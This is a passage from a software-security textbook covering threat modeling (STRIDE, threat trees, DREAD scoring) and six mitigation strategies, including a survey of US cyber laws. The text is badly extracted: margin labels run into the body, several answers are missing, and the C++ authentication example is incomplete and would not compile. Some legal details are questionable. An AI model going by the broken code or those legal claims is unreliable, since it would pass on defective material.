they are evaluating. There are six components of S.T.R.I.D.E.
Spoofing Spoofing
Pretending Spoofing identity is pretending to be someone other than who you really are. This
to be someone includes programs that mimic login screens in order to capture names and
other than who passwords, or that get you access to someone else’s passwords and then use
you really are them to access data as if the attacker were that person. Spoofing attacks
frequently lead to other types of attack. Examples include:
x Masking a real IP address so another can gain access to something that otherwise
would have been restricted.
x Writing a program to mimic a login screen for the purpose of capturing
authentication information.
Tampering Tampering
Adding, deleting, Tampering with data is possibly the easiest component of S.T.R.I.D.E. to
or changing data understand: it involves changing data in some way. This could involve simply
deleting critical data or it could involve modifying legitimate data to fit some
other purposes. Examples include:
x Someone intercepting a transmission over a network and modifying the content
before sending it on to the recipient.
x A virus modifying the program logic of a host program so malicious code is
executed every time the host program is loaded.
x Modifying the contents of a webpage without authorization.
Repudiation Repudiation
Denying or disavowing Repudiation is the process of denying or disavowing an action. In other words,
some action hiding your tracks. The final stages of an attack sometimes include modifying logs
to hide the fact that the attacker accessed the system at all. Another example is
a murderer wiping his fingerprints off of the murder weapon — he is trying to
deny that he did anything. Repudiation typically occurs after another type of
threat has been exploited. Note that repudiation is a special type of tampering
attack. Examples include:
x Changing log files so actions cannot be traced.
x Signing a credit card with a name other than what is on the card and telling the
credit card company that the purchase was not made by the card owner.
176 | Chapter 08: Threat Modeling | Unit 2: Code Hardening | Security for Software Engineers
Information Disclosure Information Disclosure
Exposing Information disclosure occurs when a user’s confidential data is exposed to
confidential data individuals against the wishes of the owner of the information. Often times, these
against the wishes attacks receive a great deal of media attention. Organizations like TJ Maxx and
of the owner of the the US Department of Veterans Affairs have been involved in the inappropriate
data disclosure of information such as credit card numbers and personal health
records. These disclosures have been the results of both malicious attacks and
simple human negligence. Examples include:
x Getting information from co-workers that is not supposed to be shared.
x Someone watching a network and viewing information in plaintext.
Security for Software Engineers | Unit 2: Code Hardening | Chapter 08: Threat Modeling | 177
Threat Trees
E In most cases, a single attack can yield other attacks. For example, an attacker
able to elevate his privilege to an administrator can normally go on to delete the
logs associated with the attack. This yields the following threat tree to the left.
R In this scenario, an elevation of privilege attack can also lead to a repudiation
Figure 08.2: attack. The above figure is a graphical way to represent this relation. There are
Simple threat tree many reasons why threat trees are important and useful tools. First, we can easily
see the root attack that is the source of the problem. Second, we can see all the
attacks that are likely to follow if the root attack is successful. This is important
because often the root attack is not the most severe attack in the tree. Finally,
the threat tree gives us a good idea of the path the attacker will follow to get to
the high value assets.
In many situations, the threat tree can involve several stages and be quite
I
involved. Consider, for example, an attacker that notices that unintended
information is made available on an e-commerce site. From this disclosure, the
S attacker is able to impersonate a normal customer. With this minimal amount of
privilege, the attacker pokes around and finds a way to change the user’s role to
administrator. Once in this state, the attacker can wipe the logs, create a new
T account for himself so he can re-enter the system at will, sell confidential
information to the highest bidder, and shut down the site at will. The complete
E
threat tree for this scenario is to the left.
One final thought about threat trees. It is tempting to simply address the root
problem, believing that the entire attack will be mitigated if the first step is
T R I D blocked. This approach is problematic. If the attacker is able to find another way
to get to the head of the threat tree through a previously unknown attack vector,
Figure 08.3:
Non-trivial threat tree
then the entire threat tree can be realized. It is far safer to attempt to address
every step of the tree. This principle is called “defense in depth.”
178 | Chapter 08: Threat Modeling | Unit 2: Code Hardening | Security for Software Engineers
4. Rank Threats
There are an infinite number of threats in a given system, some corresponding to
real vulnerabilities and some not. It is important to focus resources on the
important threats rather than wasting time on those of little value. This is why
the process of ranking threats is so important.
Threat ranking involves examining the code surrounding individual threats,
determining if a vulnerability exists, and accessing the seriousness of the
problem. While this can be computed by its severity and likelihood, it is more
useful to use the D.R.E.A.D. (damage potential, reproducibility, exploitability,
affected users, and discoverability) model (Howard & LeBlanc, 2003).
There are an infinite number of threats in a given system, some corresponding to
real vulnerabilities and some not. It is important to focus resources on the
important threats rather than wasting time on those of little value. This is why
the process of ranking threats is so important. Perhaps the simplest way to
determine the importance of a threat is through a two-axis analysis:
Severe
1 2
Likely Unlikely
3 4
Harmless
Figure 08.4: A four quadrant representation of threat importance.
From this scale, the importance of a given vulnerability can be computed.
Quadrant 4 Quadrant 4 consists of vulnerabilities that are harmless and unlikely. An example
is a stray cosmic ray (an extremely unlikely event) striking a memory location in
RAM causing an unused bit (a harmless event) to change.
Quadrant 3 Quadrant 3 is composed of likely events that are harmless. An example is an
unauthorized user attempting to log into a system (a very likely event) but being
denied access (essentially harmless).
Quadrant 2 Quadrant 2 consists of severe events that are unlikely. An example is both main
power and auxiliary power failing simultaneously for an eCommerce web server
(an unlikely event that would prove severe for an eCommerce company).
Quadrant 1 Quadrant 1 holds the most important vulnerabilities and events for a system. This
includes events that are severe and likely. An example is a worm exploiting a
previously unknown vulnerability which results in a compromised system. This is
both likely (new previously-unknown vulnerabilities are discovered frequently)
and severe.
Security for Software Engineers | Unit 2: Code Hardening | Chapter 08: Threat Modeling | 179
Threat ranking involves examining the code surrounding individual threats,
determining if a vulnerability exists, and accessing the seriousness of the
problem. While the importance of a threat can be computed by its severity and
likelihood, it is more useful to use a more detailed system: D.R.E.A.D. (damage
potential, reproducibility, exploitability, affected users, and discoverability).
Damage Potential
As the name suggests, this category describes how bad things could be if the
attack succeeds. In other words, what is the worst case scenario?
This category of threats is rated on the worst case scenario, with 10 being “asset
completely destroyed” and 0 being “no damage:”
10 Asset completely destroyed or compromised.
8 Little access to asset but possibly recoverable.
6 Significant disruption or asset not playing a key role.
4 Inconvenience to the user.
2 Slight annoyance or unimportant asset.
0 No damage whatsoever.
Reproducibility
Reproducibility is the probability that an attacker can successfully carry out a
known exploit. This is not the chance that the attacker can learn of the exploit
(discoverability), nor the amount of effort required to conduct the attack
(exploitability), but rather the chance that the attack will succeed. For example,
the reproducibility of an attack requiring split-second timing is relatively low.
This category of threats is rated on the ability of an attacker to predictably exploit
vulnerability. If, for example, a given wireless network is only vulnerable during a
solar storm which occurs every decade, the reproducibility risk will be quite low.
The score is based on a percentage estimate of success multiplied by 10, and
rounded to the nearest whole number.
risk = probability x 10
180 | Chapter 08: Threat Modeling | Unit 2: Code Hardening | Security for Software Engineers
Exploitability
The exploitability component of D.R.E.A.D. refers to how much effort is required
to successfully complete an attack. Breaking through a steel door, for example,
would require much more effort than breaking through a glass door. In both
cases, the broken door will yield a high damage potential and both attacks have
high reproducibility. However, it takes more tools, money, time, and skill to break
through a steel door than a glass door.
10 Absolutely no effort is required.
8 Access to some readily-available tools.
6 Skilled cracker or inside information.
4 A concerted effort by a large corporation can succeed.
2 Requires a breakthrough in technology and/or a large number of computers.
0 Takes a large number of supercomputers years to achieve costing billions of
dollars.
Affected Users
The affected users component of D.R.E.A.D. is purely a business category. It can
only be computed if it is known what percentage of the likely user base will have
their system configured in such a way as to expose the vulnerability. If 10 people
out of 5 million are vulnerable to a given attack, the affected users value is low.
However, if 10 out of 20 are vulnerable, it becomes a much higher priority. One
can mitigate the effect of affected users by making the vulnerable feature “off by
default.” Again, the score is based on the percentage of users multiplied by 10
and rounded.
risk = percentage x 10
Discoverability
The discoverability component of D.R.E.A.D. refers to the likelihood that an
attacker will be able to discover that a given vulnerability exists on a system. This
category realistically has no zero score because the hacking community is so well
connected. A zero score means that a given vulnerability is completely un-
discoverable. Since anything can be found, this is seldom applicable. A one refers
to vulnerabilities that are exceedingly difficult to discover without inside
knowledge. A ten means that anyone can find it; it is obvious.
Security for Software Engineers | Unit 2: Code Hardening | Chapter 08: Threat Modeling | 181
10 “The key is in the lock” or the threat is obvious to everyone.
8 Most attackers will come up with the attack in a short amount of time.
6 Though it is not obvious, it can be found with some thought or reasoning.
4 Extremely subtle or requires a large amount of creative thinking.
2 A breakthrough in thinking is required, or access to highly confidential insider
knowledge.
0 “There is no way” to discover this vulnerability.
182 | Chapter 08: Threat Modeling | Unit 2: Code Hardening | Security for Software Engineers
6. Mitigate
The purpose of making an ordered list (see step 4) is to triage the vulnerabilities.
The term “triage” originated from a technique developed by the French doctors
in WWI to treat those with the most severe injuries first. We follow a similar
technique working with security issues.
Security for Software Engineers | Unit 2: Code Hardening | Chapter 08: Threat Modeling | 183
Examples
1. Q Create a threat for an attack on a classroom
Comments All the assets uniquely accessible in the room are physical.
There is no data access potential that is unique to the room.
Also, though there are significant assets in the room, they
are the same as available elsewhere on campus.
184 | Chapter 08: Threat Modeling | Unit 2: Code Hardening | Security for Software Engineers
2. Q Create a threat for the following scenario: An attacker is sitting in the parking lot
of Lowe’s with a laptop and a large antenna. For several hours, he eavesdrops on
the wireless traffic from the store’s wi-fi network. Finally, he collects enough
data to crack the WEP key! He steps into an existing connection between the
local Lowe’s store and the franchise headquarters for the purpose of
downloading credit card data.
Security for Software Engineers | Unit 2: Code Hardening | Chapter 08: Threat Modeling | 185
3. Q Create a Data Flow Diagram from the following C++ program
/****************************************************************
* GET SECRET WORD
* Return the secret word
***************************************************************/
string getSecretWord(int key)
{
// appears random and unimportant if the binary is searched
string cipherText = "S#4T!";
return word;
}
/****************************************************************
* IS AUTHENTIC
* This function will return TRUE if the file contains the secret
* keyword and is thus authentic, and will return FALSE otherwise
****************************************************************/
bool isAuthentic(const char * fileName)
{
// open the file
ifstream fin(fileName);
if (fin.fail())
return false;
/******************************************************************
* MAIN: The elaborate UI
******************************************************************/
int main(int argc, char ** argv)
{
// display the message
cout << "The file " << argv[1]
<< (isAuthentic(argv[1]) ? "is" : "is not")
<< " authentic\n";
return 0;
}
A plaintext
text bool
User << isAuthentic getWord
15
fileName 15 S#4T!
fileName main
15 cipherText
Program boundary
Figure 08.6: DFD solution to a simple multi-function program.
186 | Chapter 08: Threat Modeling | Unit 2: Code Hardening | Security for Software Engineers
4. Q Create a Data Flow Diagram for a class implementing the ADT Stack. The UML
class diagram is the following:
Stack
- data
- capacity
- num
+ Stack
+ operator =
+ empty
+ size
+ pop
+ top
+ const_top
+ push
- grow
A
Stack
~Stack 0
empty
size num
client size data, num, capacity
data,
pop capacity
top grow
const_top
push
Stack class boundary
Security for Software Engineers | Unit 2: Code Hardening | Chapter 08: Threat Modeling | 187
5. Q Compute the D.R.E.A.D. score for the following:
x A mugger is threatening to steal my wallet.
x I am a fast runner so I suspect I can out-run him if I try.
x After having received my black belt, I have spent several years on the cage-
fighting circuit.
x This mugger appears to be after every person who walks down this street.
x Because this is a bad neighborhood, it is likely that it has occurred to all the
youth here to try their hand at mugging.
188 | Chapter 08: Threat Modeling | Unit 2: Code Hardening | Security for Software Engineers
7. Q Compute the D.R.E.A.D. score for the following: It has been discovered that all
previous versions of Adobe Flash have a bug in their implementation of the RSA
algorithm, all “secure” interchanges with a web server are significantly less
secure than previously thought. It is estimated that a third of all Internet users
use Flash to communicate with their bank or other e-commerce sites. A
knowledgeable hacker can implement an attack in about a week, but it does not
take a knowledgeable attacker to carry out the attack if a tool is created for him
or her.
Exercises
1 From memory, list and describe the steps in the threat model process.
2 Based on the “Pick the lock to gain access to the room” threat example, create
two more threats:
x Damage lock so the door cannot be opened.
x Enter through the ceiling to gain access to the room.
3 From memory, draw the Data Flow Diagram elements for each of the following:
x Interactors
x Flow
x Processors
x Storage
x Trust boundaries
4 From memory, list all the rules for a Data Flow Diagram.
Security for Software Engineers | Unit 2: Code Hardening | Chapter 08: Threat Modeling | 189
6 From memory, describe in as much detail as possible how you would compute a
D.R.E.A.D. score for each of the following categories:
x D.
x R.
x E.
x A.
x D.
Problems
1 Perform a threat model on some software of your choice.
Start with an asset list being the things the software is designed to protect. Next
create a data flow diagram of the software. Finally, come up with a sorted threat
list, each threat looking like the examples above.
190 | Chapter 08: Threat Modeling | Unit 2: Code Hardening | Security for Software Engineers
Chapter 09: Mitigation
The purpose of this chapter is to help you become aware of all possible ways to deal with security
vulnerabilities so the best possible decision can be made. You should be able to enumerate the six
responses, explain the pro’s and con’s of each in the context of a given scenario, and suggest an appropriate
strategy that reduces threats to the user’s assets.
Threat mitigation When contemplating a change to the codebase, it is essential that the change has
is the process of the maximal positive benefit to all the stakeholders. Thus a security fix that
reducing or removing reduces functionality might not be the right choice. In order to make a more
a threat informed decision as to how best to deal with a vulnerability, it is important first
from a system. to understand the options.
For example, consider the author of a program that facilitates banking
transactions for tellers working in a small regional bank. A recent audit discovered
that many of the tellers were using trivial passwords such as “1234.” Clearly this
results in security challenges. To mitigate this problem, the programmer decides
to write some code which forces passwords to conform to the following
requirements: be 15 characters, not in the dictionary, consisting of at least 3
digits, and having at least 5 unique symbols. This certainly addresses the problem,
but introduces several new ones (the tellers write their new password on a note
and fasten it to their screen). What else could be done? A few ideas:
x Send a notification of weak passwords to the manager who could then use the
opportunity to educate the teller in a kinder way.
x Create a policy where weak passwords could result in disciplinary action.
x Redirect failed login attempts to a fake server which monitors the actions of
potential intruders.
As you can see, there are many more possible recourses to the programmer than
was first apparent. In order to choose the best possible action, the programmer
needs to know what is available.
This chapter will present the six fundamental ways in which a defender can
respond to an attack: prevention, preemption, deterrence, deflection, detection,
and countermeasures (Halme & Bauer, 1996). Each of these six will be described,
related to the scenario of protecting your car, and presented in the context of
network security protective measures.
Security for Software Engineers | Unit 2: Code Hardening | Chapter 09: Mitigation | 191
Prevention
Prevention is the process of increasing the difficulty of an attack by removing or
reducing vulnerabilities, introducing trust boundaries to complicate attack
vectors, or strengthening defensives. The goal of all prevention activities is not
necessarily to preclude a successful attack, but rather to increase the difficulty of
the attack to the point where it is no longer worth the effort. While attackers
retain the Attacker’s Advantage, defenders have the home-field advantage. In
other words, defenders are free to change the rules of the game to favor their
side. This is the essence of prevention techniques. Threat modeling coupled with
code hardening are two of the most commonly used prevention techniques.
Safety is only a function of the strength of the protection and the level of
Disadvantage determination of the attacker. If the attacker really wants to get in, he is likely to
eventually find a way.
The vast majority of threat mitigation strategies should focus on prevention. This
can happen using either training, policy, or technology tools.
192 | Chapter 09: Mitigation | Unit 2: Code Hardening | Security for Software Engineers
Training Consider a denial attack on a credit card call center. The attacker calls the credit
card company and tricks the operator into deleting an important part of a
customer file. This attack can be mitigated by training the operators about the
attack so they can recognize it if it is attempted again. Training is the process of
making human operators more knowledgeable so they can respond to previously
unseen attacks.
Policy Policy mitigation strategies occur when a procedure is developed and given to
employees which is designed to prevent such an attack. Back to our call center
example, the managers could identify a set of steps the operators are to follow
when a caller wishes to delete a part of a customer file. The manager would then
distribute this procedure to all the operators and make sure they understand
how it works. Policy mechanisms are algorithms carried out by people. Their
effectiveness is a function of how complete the policy is, how well understood
the policy is, and how closely the policy is followed. If the attacker is able to find
a weakness in any of these three components, then an opportunity for attack
may exist.
Technology By far, the most common prevention mitigation strategy a software engineer
would follow uses technology. In almost every case, it involves fixing a bug or
introducing a new security check. Back to our call center example, this could be
to introduce a prompt for a password from the manager before parts of a
customer file are deleted. Technology mechanisms can be implemented in
software or hardware. Even the lock to a door is considered a technology
prevention mechanism.
Security vulnerability bug fixes are typically treated differently than normal bug
fixes. A developer would normally fix a bug by simply changing the code and
recompiling. Security bug fixes, on the other hand, are normally accompanied by
a code review. Another developer, possibly a security expert or a manager, would
look at the proposed fix and approve it before it is incorporated into the code
base. The proposed fix is usually described in terms of a “diff.” A code diff is the
difference between the original code and the proposed change. On Linux
systems, the diff command is used to produce a diff. An example of the results
of a diff are following:
139c139
< while (string::npos != iEnd);
---
> while (string::npos != iEnd && !sFullName.empty());
Here we can see that the difference between the two files occurs at line 139. The
code to be removing is the part of a while loop having a single component to the
Boolean expression. The new code introduces a second clause.
Security for Software Engineers | Unit 2: Code Hardening | Chapter 09: Mitigation | 193
Preemption
Imagine a soldier watching an invasion army gather just across the border. An
attack is surely going to occur. Why wait for it to happen on the enemy’s terms?
Wouldn't it be better to strike first before the enemy is ready? In this scenario,
the soldier is contemplating preemption.
Preemption is the process of striking offensively against a likely threat agent prior
Definition to an intrusion attempt for the purpose of lessening the likelihood of a particular
intrusion occurring later.
In the context of protecting my car, it might include seeking out known car
Example thieves in a given neighborhood before attempting to park a car. By removing all
the potential attackers, none is left to damage the car.
The primary advantage of preemption is that the attack never occurs; none of
Advantage
the other defensive measures ever come to play.
194 | Chapter 09: Mitigation | Unit 2: Code Hardening | Security for Software Engineers
Deterrence
At all points in time, the attacker has to ask himself: is it worth it? If the asset is
worth the risk, then the attacker will probably launch the attack. Otherwise, he
probably will not. Deterrence is the process of manipulating this decision process.
In the context of protecting a car, it might include increasing the penalty of car
theft. Thieves would then not target cars because the rewards would not be
Example worth the risks. A mob boss might also use deterrence to protect his car. No one
in their right mind would take “Big Jimmy’s” car because the consequences would
be severe.
The attacker does not see the value in launching an attack so the attack never
Advantage
occurs.
The process of devaluing the targeted asset might have the side effect of making
Disadvantage the asset not valuable to the customer as well. Also, modification of the risk side
of the equation is often an expensive and difficult process.
The main deterrence mechanism is the force of law. There are several laws
governing behavior on the Internet. The most important are the National
Information Infrastructure Protection Act (NII), Digital Millennium Copyright Act
(DMCA), Child Online Protection Act (COPA), Computer Fraud and Abuse Act, and
Identity Theft and Assumption Deterrence. These and other laws and statutes
cover a wide range of Internet activities.
Malware
Malware is defined as a piece of software designed to perform a malicious intent.
There are two main laws regulating malware:
Computer Fraud This act makes it illegal to gain unauthorized access to a protected computer,
and Abuse Act distribute malware, and distribute authentication data.
Digital Millennium “DMCA”: Though this law mostly pertains to Digital Rights Management (DRM),
Copyright Act it also makes it illegal to create or distribute technology designed specifically to
circumvent security mechanism.
Though only one person (Robert Morris, author of the Morris Worm) has ever
been prosecuted under the original Computer Fraud and Abuse Act (US v. Morris,
1991), the frequent revisions of this law have made it the mainstay of cybercrime
deterrence.
Security for Software Engineers | Unit 2: Code Hardening | Chapter 09: Mitigation | 195
Spyware
Spyware is defined as a program hiding on a computer for the purpose of
monitoring the activities of the user. There are two main laws regulating spyware:
Safeguard Against “SPY-ACT”: This act makes it illegal to write or distribute programs that are
Privacy Invasions Act deceptive, collect PII (Personally Identifiable Information), disable anti-malware
scanners, or install botware.
Software Principles Yield “SPY BLOCK”: This act makes it illegal to install software through unfair or
Better Levels of deceptive acts. Disclosure of PII must be made through consent of the user. This
Consumer Knowledge bill never became law because it was never brought before the Senate or House
to vote.
Though the stronger SPY BLOCK was never made law, SPY-ACT is sufficient to
define spyware and legislate the creation and distribution of spyware.
Denial of Service
A Denial of Service (DoS) or Distributed Denial of Service (DDoS) attack is an attack
designed to render a system unavailable for its intended use. There is one act
regulating to DoS and DDoS attacks:
National Information “NII”: An amendment to the Computer Fraud and Abuse Act making it illegal to
Infrastructure Protection intentionally cause damage to another computer or system even if the attacker
Act never circumvented authorization mechanisms.
Though NII makes DoS and DDoS attacks illegal, it has proven to be very difficult
to prosecute. There are two factors contributing to this fact. First, it is often
difficult to prove that $5,000 damages were incurred due to the attack. Second,
it is often difficult to identify the attacker.
SPAM
SPAM is irrelevant or inappropriate messages sent on the Internet in large
numbers. One law was created to capture all aspects of SPAM:
Controlling the Assault “CAN-SPAM”: It is illegal to hire a spammer to send SPAM on your behalf, send
of Non-Solicited SPAM to users who have opted-out, fake an e-mail header, or send
Pornography and Marketing inappropriate content to minors.
SPAM violators can be fined up to $6,000,000 for violations. However, since CAN-
SPAM’s jurisdiction is the United States, it can do nothing to address SPAM
originating from other countries.
196 | Chapter 09: Mitigation | Unit 2: Code Hardening | Security for Software Engineers
Phishing
Phishing is defined as impersonating reputable companies in order to obtain
personal information. There are three laws regulating phishing:
Bank Fraud Act It is illegal to defraud a financial institution or to obtain any financial benefit by
spoofing a financial institution. Maximum penalty is $1,000,000 and 30 years
imprisonment.
Computer Fraud and It is illegal to use botnets and many spoofing techniques to create believable
Abuse Act phishing messages.
Controlling the Assault of “CAN-SPAM”: It is illegal to send large numbers of unwanted messages, which is
Non-Solicited Pornography the typical delivery mechanism for phishing attacks.
and Marketing
Phishers are actively pursued by the federal government through the Federal
Trade Commission (FTC). Additionally, the Anti-Phishing Working Group is a
private watch-dog organization helping to identify and mitigate phishing attacks.
Identity Theft
Identity Theft is the process of assuming another’s identity without permission.
There are three laws regulating identity theft:
Identity Theft and It is illegal to transfer unauthorized or false identification documents.
Assumption Deterrence Act
Internet False Identification It is illegal to distribute counterfeit identification documents and credentials.
Prevention Act
SAFE ID Act Generalizes any way to identify an individual, including most forms of PII. This
act never became law.
These laws make it unlawful to “knowingly transfer or use without lawful
authority, a means of identification of another person with the intent to commit
or to aid or abet any unlawful activity that constitutes a violation of federal law.”
Security for Software Engineers | Unit 2: Code Hardening | Chapter 09: Mitigation | 197
Children
Children are afforded special protection under the law. Most of this protection is
specified in one Law: COPA
Child Online “COPA”: It is illegal to distribute inappropriate content to minors.
Privacy Protection Act
The main components of this law regulate the following types of material:
x The “average person, applying contemporary community standards, would find”
that the material taken as a whole, with respect to minors, was designed to
appeal to or pander to prurient interests. This means that the law is defined in
relation to society norms.
x The material depicted, described, or represented, “in a manner patently offensive
with respect to minors, an actual or simulated sexual act or sexual contact, an
actual or simulated normal or perverted sexual act, or a lewd exhibition of
genitals or post-pubescent female breasts.”
x The material, taken as a whole, lacked “serious literary, artistic, political, or
scientific value for minors.”
If deterrence is to be pursued as a threat mitigation strategy, it is necessary to
identify the law or policy the attacker would violate, how knowledge of the law
or policy would be communicated to the potential attacker, and what the
consequences of such a violation would entail. For example, consider an
organization wishing to deter users from playing online games on the company
network. The organization would need to create a policy forbidding playing of
online games, this new policy would have to be communicated to all employees
through an e-mail or some other avenue, and then administrators would be given
the authority to disable the account of a user if the user is found playing the game.
198 | Chapter 09: Mitigation | Unit 2: Code Hardening | Security for Software Engineers
Deflection
Perhaps the importance of deflection is best described by Winston Churchill: “In
time of war, the truth is so precious, it must be attended by a bodyguard of lies.”
A determined or educated attacker will not be fooled. In other words, the more
Disadvantage knowledgeable and determined the attacker, the more difficult it would be to
deceive him.
The point of deflection defenses is to trick the attacker into not launching an
attack against an actual asset, instead diverting him to a harmless location. This
can be accomplished by creating a fake asset which appears so desirable that the
attacker is compelled to pursue it. Note that deflection techniques of this nature
are only as effective as the believability of the deception; if the attacker catches
on, the game is up.
Another class of deflection defenses strives to confuse the attacker, making it
difficult for him to separate what is real and what is fabricated. By showering the
attacker with contradictory information, his ability to find the information he
seeks becomes exceedingly difficult.
Security for Software Engineers | Unit 2: Code Hardening | Chapter 09: Mitigation | 199
Detection
Detection is the process of identifying an intrusion. This detection can occur
during the intrusion attempt or long after the fact. It can happen automatically or
with significant human intervention. It can be elaborate, involving hardware
tools, software tools, and policy, or it may be as simple as a log. In each case, the
end result of detection is an alert.
In the context of protecting a car, the classic detection mechanism is a car alarm.
Example Its only function is to detect break-in attempts so the police or others can stop
them.
Note that detection mechanisms are often employed for non-mitigation reasons.
For example, consider a company storing a large number of usernames and
passwords in a database. The company may choose to create a fake account and
include the credentials in the database. If anyone attempts to use the fake
account, then the company can detect that the database was compromised. This
gives the company knowledge that an attack occurred without mitigating the
underlying vulnerability in any way.
200 | Chapter 09: Mitigation | Unit 2: Code Hardening | Security for Software Engineers
For any detection system to be effective, it is necessary to continually monitor all
the activity of a system in an effort to identify suspicious activity. Thus all
detection mechanisms must be complete, reliable, timely, and understandable:
Complete Detect a wide variety of intrusions, including attacks originating from inside or
outside the system as well as known and unknown attack vectors. The
completeness goal is necessary to give the user of the system confidence that
all intrusion attempts, especially the successful ones, are known. If all successful
intrusions are not detected, then it is difficult for the system to make
confidentiality assurances. However, even if there are no successful attacks,
understanding the number and composition of attempts is important when
contemplating future changes to defensive measures.
Reliable Reliability is the measure of the probability that a given attack will be
recognized. If, for example, an attack will be detected five times out of ten,
then it has 50% reliability. Detection systems need to be sufficiently reliable so
that they can be trusted. This typically means a reliability rating of close to
100% in most cases. False positives will train users to ignore (or at least take
less seriously) possible attacks. False negatives will miss real attacks. For the IDS
(Intrusion Detection System) to reach its full potential of being a reliable alarm
system, accuracy is required.
Timely Timely means that the point in which an intrusion was detected should be close
to the time when the intrusion occurred. Timeliness is required if any action is
to be taken against an ongoing attack. This gives the defender the opportunity
to make an appropriate response. Butch Cassidy, the famous outlaw from the
wild west, compromised the timeliness of existing detection mechanisms by
cutting the telegraph wires near the banks he was planning on robbing, thereby
giving him more time to make his getaway.
Understandable Understandability is the function of presenting warnings and analysis in a
coherent fashion. Ideally, this should be a green or red light. Since intrusions
are often complex, more detailed analysis is often needed. Because the human
component is an important part of any detection mechanism, the
understandable goal is also important. In other words, it is less than optimal to
barrage the user with a stream of incomprehensible data when an intrusion has
been detected. Instead, the IDS should present information in such a way as to
encourage the user to draw appropriate conclusions and take the appropriate
action. A key component of this is allowing the user to know the severity and
scope of the attack.
If detection is to be used as a threat mitigation strategy, then a detailed
procedure will have to be created describing how the attack will be detected in a
complete, reliable, timely, and understandable manner. All four of these issues
will need to be addressed.
Security for Software Engineers | Unit 2: Code Hardening | Chapter 09: Mitigation | 201
Countermeasures
In the simplest possible terms, countermeasures are detection coupled with
prevention. First an attack is detected, and then the defenses are strengthened.
An attacker is not likely to continue if the difficulty has increased significantly due
Advantage to his activities. Similarly, if the likelihood of being caught increases, the attacker
may be persuaded to cease his attack.
There are very few countermeasure tools and techniques in security. Part of the
problem is that if the attacker can get the defensive mechanisms to activate
prematurely, then a denial of service attack could result. For example, consider a
disgruntled employee wishing to harm his former employer. He considers burning
his employer’s offices, but that is too risky (deterrence). He considers breaking in
at night to steal important assets, but the locks are too strong (prevention).
Finally, he decides to trigger an alarm during a busy time of the day. This results
in the business being shut down for hours and a great deal of lost business.
For countermeasures to be effective, there needs to be a well-defined difference
between the “normal” state of operation and the “alert” state. There also needs
to be a well-defined protocol to transit back and forth between the two states.
For example, consider a colony of ants. They normally go about their business
collecting food. However, if you were to pour a glass of water onto their ant hill,
they run around much faster and the warrior ants come to the surface. Then, after
a while, everyone gets the signal that the attack is over and everyone returns to
normal.
In the computational world, the “alert” state of a system is usually characterized
by more detail logging, more scrutiny of activities by various employees, and
restricted access to assets.
202 | Chapter 09: Mitigation | Unit 2: Code Hardening | Security for Software Engineers
Examples
1. Q What is the difference between a code review and threat modeling?
A Code review is the process of looking through all the code looking for defects
while a threat model is focusing on the parts of the code where vulnerabilities
are most likely to be dangerous.
2. Q Name the threat mitigation strategy based on the following description: A mob
boss makes grave threats to anyone who even thinks of stealing his possessions.
A Deterrence. The repercussions are severe if the mob boss finds out it was you.
4. Q Name the threat mitigation strategy based on the following description: When
I was a boy, I wedged a piece of paper in the crack of my bedroom door so I
could tell if my sister was sneaking into my room. If she opened the door, the
paper would fall to the ground.
A Detection. The paper was designed to keep the attacker from getting away with
the intrusion.
5. Q I am the owner of a small business. Identify the anti-intrusion tool used in the
following mechanism to protect my business: There is an alarm on the doors
and windows that I activate every night.
A Detection. The alarm does nothing other than inform people that an intrusion
is underway.
6. Q I am the owner of a small business. Identify the anti-intrusion tool used in the
following mechanism to protect my business: My business was built next door
to a jewelry store.
7. Q I am the owner of a small business. Identify the anti-intrusion tool used in the
following mechanism to protect my business: I have put the valuables in a very
strong safe.
Security for Software Engineers | Unit 2: Code Hardening | Chapter 09: Mitigation | 203
8. Q I am the owner of a small business. Identify the anti-intrusion tool used in the
following mechanism to protect my business: I posted a sign which reads
“shoplifters will be prosecuted”
A Deterrence. I am hoping the threat of punishment will keep people from stealing
my valuables.
9. Q I am the owner of a small business. Identify the anti-intrusion tool used in the
following mechanism to protect my business: I am always on the lookout for
suspicious behavior.
10. Q I would like to use all six anti-intrusion methods to protect my wallet as I walk
the street at night.
204 | Chapter 09: Mitigation | Unit 2: Code Hardening | Security for Software Engineers
11. Q A network administrator heard through the grapevine that one of the users has
installed a password cracking program with the intention of launching an
elevation of privilege attack. Provide a prevention mitigation for this potential
attack.
12. Q The president of a university heard that some students are using file sharing
software to illegally distribute copyright-protected music. Provide a detection
mitigation for this problem.
13. Q I am writing a simple game for a mobile device. This game keeps the high score
list in a separate file. The integrity of the game will be severely compromised if
people can just edit the score file to make it appear that they have achieved an
impressive score. Describe a countermeasure mitigation strategy to address this
threat.
14.Q I am writing a password managing program for the iOS platform. I am concerned
that, if a user’s phone is stolen, an attacker may attempt to crack the master
password using a brute-force attack. Describe a deterrence mitigation for this
potential attack.
A I would create a notice informing users that police would be notified of attempts
to crack the password. I would then use the phone’s GPS feature to send attack
attempts to the police.
Security for Software Engineers | Unit 2: Code Hardening | Chapter 09: Mitigation | 205
Exercises
1 From memory, list the three types of injection vulnerabilities and describe their
distinguishing characteristics.
206 | Chapter 09: Mitigation | Unit 2: Code Hardening | Security for Software Engineers
6 Name the anti-intrusion approach used in each of the following scenarios:
x Germany invaded France in WWI because, at that time, France possessed a
purely offensive army and Germany was afraid of an imminent invasion.
x A high ranking officer or leader frequently travels with a couple of body-
doubles.
x The A10 Thunderbolt II close air support ground-attack aircraft shields the
pilot and critical gear in a titanium tub that can withstand small-arms fire.
x Many attribute the fact that WWIII was never fought to the policy of
“Mutually Assured Destruction” or MAD.
x When a U-Boat attacks a convoy, the defending destroyers respond by
trying to sink the attacker with depth-charges.
x During WWII, the Allies (and probably Axis) employed spies around every
Nazi airbase so a warning could be sent when an attack was eminent.
Dearly beloved, avenge not yourselves, but rather give place unto wrath: for it
is written, Vengeance is mine; I will repay, saith the Lord.
Describe this warning in the context of mitigation strategies.
Security for Software Engineers | Unit 2: Code Hardening | Chapter 09: Mitigation | 207
Problems
1 Please define the following terms:
x Code Review
x Threat Modeling
x Code Hardening
2 From memory, please list and define the six ways to mitigate a threat.
3 A network administrator heard through the grapevine that one of the users has
installed a password cracking program with the intention of launching an
elevation of privilege attack. Provide a preemption mitigation for this potential
attack.
4 The president of a university heard that some students are using file sharing
software to illegally distribute copyright-protected music. Provide a deterrence
mitigation for this problem.
5 I am writing a simple game for a mobile device. This game keeps the high score
list in a separate file. The integrity of the game will be severely compromised if
people can just edit the score file to make it appear that they have achieved an
impressive score. Describe a deflection mitigation strategy to address this
threat.
6 I am writing a blogging tool for a large company. The administrator of the tool
said he will want to know if anyone inside or outside the company tries to get
